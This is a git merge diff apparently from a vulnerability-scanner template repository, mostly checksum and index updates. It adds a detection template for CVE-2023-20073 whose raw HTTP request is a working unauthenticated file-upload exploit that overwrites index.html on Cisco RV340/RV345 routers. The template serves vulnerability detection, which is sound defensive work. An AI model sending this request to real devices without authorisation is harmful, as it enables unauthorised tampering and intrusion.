Merge branch 'main' into princechaddha-patch-5

.new-additions

@@ -1,11 +1,13 @@
 http/cnvd/2021/CNVD-2021-32799.yaml
 http/cves/2020/CVE-2020-11798.yaml
 http/cves/2022/CVE-2022-22897.yaml
+http/cves/2023/CVE-2023-20073.yaml
 http/cves/2023/CVE-2023-27034.yaml
 http/cves/2023/CVE-2023-30150.yaml
 http/exposed-panels/greenbone-panel.yaml
 http/misconfiguration/php-debugbar-exposure.yaml
 http/takeovers/lemlist-takeover.yaml
+http/technologies/wordpress/plugins/wp-seopress.yaml
 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml
 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
 workflows/kev-workflow.yaml

cves.json

@@ -1874,6 +1874,7 @@
 {"ID":"CVE-2023-1730","Info":{"Name":"SupportCandy \u003c 3.1.5 - Unauthenticated SQL Injection","Severity":"critical","Description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1730.yaml"}
 {"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"}
 {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"}
+{"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"}
 {"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"}
 {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"}
 {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"}

cves.json-checksum.txt

@@ -1 +1 @@
-ca06a423c3060a823fd114b48fa25c93
+10d9a27947a3f24e33157abe7c7a3bfc

helpers/wordpress/plugins/elementskit-lite.txt

@@ -1 +1 @@
-2.9.0
+2.9.2

helpers/wordpress/plugins/siteorigin-panels.txt

@@ -1 +1 @@
-2.25.2
+2.25.3

http/cves/2023/CVE-2023-20073.yaml

@@ -0,0 +1,79 @@
+id: CVE-2023-20073
+
+info:
+  name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload
+  author: princechaddha,ritikchaddha
+  severity: critical
+  description: |
+    A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
+  reference:
+    - https://unsafe.sh/go-173464.html
+    - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f
+    - https://github.com/RegularITCat/CVE-2023-20073/tree/main
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-20073
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-20073
+    cwe-id: CWE-434
+    cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
+    epss-score: 0.0014
+  metadata:
+    fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
+    max-request: 3
+    product: rv340_firmware
+    vendor: cisco
+    verified: true
+  tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive
+
+variables:
+  html_comment: "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body
+
+http:
+  - raw:
+      - |
+        GET /index.html HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: 1
+        Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf
+
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="pathparam"
+
+        Portal
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="fileparam"
+
+        index.html
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="file.path"
+
+        index.html
+        --------------------------f6f99e26f3a45adf
+        Content-Disposition: form-data; name="file"; filename="index.html"
+        Content-Type: application/octet-stream
+
+        {{index}}
+        {{html_comment}}
+
+        --------------------------f6f99e26f3a45adf--
+      - |
+        GET /index.html HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: dsl
+        name: index
+        internal: true
+        dsl:
+          - body_1
+
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - "{{html_comment}}"

http/takeovers/aws-bucket-takeover.yaml

@@ -34,9 +34,17 @@ http:
         part: host
         words:
           - "amazonaws.com"
+          - "ks3.ksyun.com"
           - "kss.ksyun.com"
-          - "ks3-sgp.ksyun.com"
+          - "kss3.ksyun.com"
           - "ks3-cn-beijing.ksyun.com"
+          - "ks3-cn-guangzhou.ksyun.com"
+          - "ks3-cn-hk-1.ksyun.com"
+          - "ks3-cn-shanghai.ksyun.com"
+          - "ks3-jr-beijing.ksyun.com"
+          - "ks3-jr-shanghai.ksyun.com"
+          - "ks3-rus.ksyun.com"
+          - "ks3-sgp.ksyun.com"
           - "obs.jrzq.huaweicloud.com"
           - "obs.petalpay.huaweicloud.com"
           - "oss-cn-hangzhou.aliyuncs.com"

http/technologies/wordpress/plugins/cloudflare.yaml

@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cloudflare/
   metadata:
-    max-request: 1
     plugin_namespace: cloudflare
     wpscan: https://wpscan.com/plugin/cloudflare
   tags: tech,wordpress,wp-plugin,top-200

templates-checksum.txt

@@ -434,7 +434,7 @@ helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd
 helpers/wordpress/plugins/google-listings-and-ads.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f
 helpers/wordpress/plugins/google-site-kit.txt:2a1ecd0865cf9f0cf108581f7ef983c057b16522
 helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61
-helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62
+helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5
 helpers/wordpress/plugins/gutenberg.txt:9f53fbdab55466cefaf599f5bceaef6d80f925de
 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761
@@ -443,7 +443,7 @@ helpers/wordpress/plugins/header-footer-elementor.txt:a9510f9e42b212b735a604c279
 helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317
 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc
 helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716
-helpers/wordpress/plugins/host-webfonts-local.txt:687641b17b33b931bde73a94976c0ea5c1c05de7
+helpers/wordpress/plugins/host-webfonts-local.txt:387952c690b1128f689112e2e9aaa2f8692414d8
 helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c
 helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555
 helpers/wordpress/plugins/insert-headers-and-footers.txt:d24fa45ca77f079cc359c97272276969e6aead2c
@@ -478,7 +478,7 @@ helpers/wordpress/plugins/ninja-forms.txt:2aee11d7a9ddfedc94e7fb36aefcf9174d34d8
 helpers/wordpress/plugins/ocean-extra.txt:248fa1629a5449451dde60521b10f8d16f52b23d
 helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643
 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8
-helpers/wordpress/plugins/optinmonster.txt:43d658fcb5e8bd6cac245dd878e485a7651c9a4f
+helpers/wordpress/plugins/optinmonster.txt:efeb47fd41d5443772275287ca2523cab8bc0139
 helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606
 helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58
@@ -528,7 +528,7 @@ helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c47
 helpers/wordpress/plugins/user-role-editor.txt:e4dcf50721abd61e4b9d3234623bdf059936514b
 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264
 helpers/wordpress/plugins/w3-total-cache.txt:51ddbf27bf181d542a23643649c61739795a6771
-helpers/wordpress/plugins/webp-converter-for-media.txt:479e7dca067e6bab09a59b119f7c54a136587a83
+helpers/wordpress/plugins/webp-converter-for-media.txt:2cb2c87ac5ebde3b1ed1d5d55a5747b6f05ee8f7
 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c
 helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1
@@ -557,6 +557,7 @@ helpers/wordpress/plugins/wp-optimize.txt:a80f092daaa12261340a5e337b2b07581bbb7e
 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f
 helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a
 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad
+helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c
 helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5
 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c
 helpers/wordpress/plugins/wp-statistics.txt:ba6836727c43276747538b05f07749b5b00bb410
@@ -2493,6 +2494,7 @@ http/cves/2023/CVE-2023-1698.yaml:8d8e33c0cf2c9c9c13bedead72eff88454b1169b
 http/cves/2023/CVE-2023-1730.yaml:0e2a8f334779fb2f99dc82108a81f2cb7e50df46
 http/cves/2023/CVE-2023-1835.yaml:3913951a93725e648684d6302c8cce34e7d6e612
 http/cves/2023/CVE-2023-1890.yaml:6925b8f7ba4fa792d8ee07ee0962e183272fb084
+http/cves/2023/CVE-2023-20073.yaml:08ed7f37240cbf22329b107b879aa42873742229
 http/cves/2023/CVE-2023-2023.yaml:acddd86bc6b49c14a39ae29b108d24230e3ba395
 http/cves/2023/CVE-2023-20864.yaml:8447dd3e233d64f7bc2957484b5b7e1a1fa66971
 http/cves/2023/CVE-2023-20887.yaml:f08a9e26ad301b4aa1f309e9c77719d35402494d
@@ -5357,7 +5359,7 @@ http/takeovers/aha-takeover.yaml:4a7081145362b132f140b91f49c9415ad7898ad0
 http/takeovers/airee-takeover.yaml:3fd80d628f4b563459299ad878a256358015f82f
 http/takeovers/anima-takeover.yaml:fa5a85318b320a4c4cd79d0b5c955352f0badc78
 http/takeovers/announcekit-takeover.yaml:24610659f1545855c3ce01cfbfc31d3224df1634
-http/takeovers/aws-bucket-takeover.yaml:15bbe6d32b0ac02974035b2c95de00377b79a1e3
+http/takeovers/aws-bucket-takeover.yaml:a82212c2018cb002f06ea68595255108c05908d0
 http/takeovers/bigcartel-takeover.yaml:d092cbe295a8fdac05088058e66f4decd80aa919
 http/takeovers/bitbucket-takeover.yaml:fcf027f73f0bf36fb0701a2ccc9856d01768b0a0
 http/takeovers/campaignmonitor-takeover.yaml:22826ba9f9e3c4fd742fe4325f5935f804b091f6
@@ -5976,6 +5978,7 @@ http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736
 http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
 http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
 http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
 http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825
 http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
@@ -7013,7 +7016,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:c65310b62b0b883587dd25a5a3c37a4fdf07e3f6
+templates-checksum.txt:7e20c26f6088562f44e41ddaf7654c2ea6075287
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f